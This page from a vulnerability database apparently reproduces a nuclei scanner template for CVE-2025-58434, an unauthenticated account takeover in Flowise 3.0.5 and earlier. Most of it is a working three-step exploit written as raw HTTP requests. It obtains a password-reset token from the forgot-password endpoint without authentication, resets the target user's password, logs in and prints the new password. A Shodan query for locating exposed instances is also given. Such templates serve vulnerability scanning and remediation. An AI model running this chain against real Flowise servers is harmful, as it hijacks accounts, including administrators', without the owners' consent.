Lucene search
K

Flowise <= 3.0.5 - Account Takeover

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 68 Views

Flowise versions 3.0.5 and earlier allow account takeover via unauthenticated forgot-password token.

Related
Refs
Code
id: CVE-2025-58434

info:
  name: Flowise <= 3.0.5 - Account Takeover
  author: nukunga[seunghyeonJeon]
  severity: critical
  description: |
    Flowise versions 3.0.5 and earlier had a vulnerability in the forgot-password endpoint, which returned valid reset tokens without authentication—allowing attackers to reset passwords and take over accounts.
  impact: |
    Unauthenticated attackers can obtain valid password reset tokens without authentication, enabling account takeover of any user including administrators through password reset attacks.
  remediation: |
    Upgrade Flowise to version 3.0.6 or later that properly protects password reset token generation.
  reference:
    - https://github.com/advisories/GHSA-wgpv-6j63-x5ph
    - https://nvd.nist.gov/vuln/detail/CVE-2025-58434
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-58434
    epss-score: 0.50118
    epss-percentile: 0.9877
    cwe-id: CWE-306
  metadata:
    verified: true
    shodan-query: http.title:"Flowise - Build AI Agents, Visually"
  tags: cve,cve2025,flowise,ato,rce,unauth,vuln,ai

variables:
  username: "{{username}}"
  new_password: "{{rand_text_alphanumeric(12)}}"

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        POST /api/v1/account/forgot-password HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"user":{"email":"{{username}}"}}

    extractors:
      - type: regex
        name: token
        part: body
        group: 1
        regex:
          - '"tempToken":"([A-Za-z0-9]{64})"'
        internal: true

    matchers:
      - type: dsl
        dsl:
          - status_code == 201
        internal: true


  - raw:
      - |
        POST /api/v1/account/reset-password HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "user": {
            "email": "{{username}}",
            "tempToken": "{{token}}",
            "password": "{{new_password}}"
          }
        }

    matchers:
      - type: dsl
        dsl:
          - status_code == 201
        internal: true

  - raw:
      - |
        POST /api/v1/auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "email": "{{username}}",
          "password": "{{new_password}}"
        }

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, 'id', '{{username}}', 'activeWorkspaceId')
        condition: and

    extractors:
      - type: dsl
        dsl:
          - '"Password:" + new_password'
# digest: 4a0a0047304502202d361b7412173e09031fbad701253fbea4fd99bf2ae33b5faada04df394abecb022100a35491faaec649a57fde03362dd60d370b771f5f49e5c96b5903d2ff702da350:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.19.8
EPSS0.50118
SSVC
68